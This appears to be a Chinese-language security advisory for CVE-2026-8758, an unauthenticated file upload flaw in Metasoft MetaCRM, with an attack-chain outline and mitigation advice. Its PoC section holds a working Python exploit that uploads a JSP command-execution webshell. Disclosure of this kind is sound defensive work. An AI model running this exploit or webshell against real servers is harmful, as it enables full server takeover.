IPBUF安全漏洞报告
English
CVE-2026-8758 CVSS 7.3 高危

CVE-2026-8758 MetaCRM任意文件上传漏洞

披露日期: 2026-05-17

漏洞信息

漏洞编号
CVE-2026-8758
漏洞类型
任意文件上传
CVSS评分
7.3 高危
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
无需交互 (UI:N)
影响产品
Metasoft 美特软件 MetaCRM

相关标签

任意文件上传MetaCRMWebShell远程代码执行高危漏洞

漏洞概述

Metasoft美特软件MetaCRM在6.4.0 Beta06及之前版本中存在严重的安全漏洞。该漏洞源于/common/jsp/upload3.jsp文件对上传参数处理不当,导致未授权的攻击者可以通过网络发送特制请求,执行任意文件上传操作。由于攻击无需用户交互和认证,且利用代码已公开,攻击者可轻易利用此漏洞获取服务器控制权或植入WebShell,对系统机密性、完整性和可用性造成严重影响。

技术细节

该漏洞位于Metasoft MetaCRM系统的/common/jsp/upload3.jsp组件中,核心原因在于应用程序在处理文件上传请求时,缺乏必要的安全校验机制。具体而言,服务器端未对用户提交的"File"参数进行严格的文件类型白名单过滤、文件大小限制以及上传路径的合法性检查。攻击者可以通过构造特定的HTTP POST请求,绕过可能存在的前端JavaScript验证,直接向服务器Web目录上传恶意的可执行脚本文件(如JSP格式的WebShell)。由于系统未对上传文件的存储目录设置禁止执行的权限配置,攻击者上传的恶意文件极有可能被Web容器解析并执行,进而导致服务器被完全控制。根据CVSS 3.1评分标准,该漏洞评分为7.3分,属于高危漏洞。攻击利用无需任何权限认证且无需用户交互,目前厂商尚未提供修复补丁,且利用细节已公开。

攻击链分析

STEP 1
侦察
攻击者通过网络扫描识别出目标服务器运行的是Metasoft MetaCRM系统,且版本低于等于6.4.0 Beta06。
STEP 2
漏洞探测
攻击者访问/common/jsp/upload3.jsp接口,确认该接口存在且未进行严格的权限验证。
STEP 3
漏洞利用
攻击者构造恶意HTTP POST请求,在File参数中绑定包含恶意代码的JSP文件并发送至服务器。
STEP 4
执行与控制
服务器接收并保存文件,攻击者通过浏览器访问上传的JSP文件路径,执行系统命令从而控制服务器。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # Target URL url = "http://target-ip/common/jsp/upload3.jsp" # Malicious JSP WebShell content jsp_shell = """<%@ page import="java.io.*" %> <% String cmd = request.getParameter("cmd"); if(cmd != null) { Process p = Runtime.getRuntime().exec(cmd); InputStream is = p.getInputStream(); int i; while((i=is.read())!=-1) { out.print((char)i); } } %>""" # Prepare the file upload payload files = { 'File': ('evil.jsp', jsp_shell, 'application/octet-stream') } try: response = requests.post(url, files=files, timeout=10) if response.status_code == 200: print("[+] Exploit success! File uploaded.") print("[+] Access your shell at: http://target-ip/path/to/upload/evil.jsp?cmd=whoami") else: print("[-] Exploit failed. Status code:", response.status_code) except Exception as e: print("[-] Error:", str(e))

影响范围

Metasoft 美特软件 MetaCRM <= 6.4.0 Beta06

防御指南

临时缓解措施
建议立即在服务器端限制/common/jsp/upload3.jsp的访问权限(如删除或重命名该文件),并在Web应用防火墙(WAF)中添加规则,拦截对该路径的异常POST请求。同时,全面检查服务器上传目录,查找并清除近期上传的可疑文件(如.jsp、.jspx等)。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表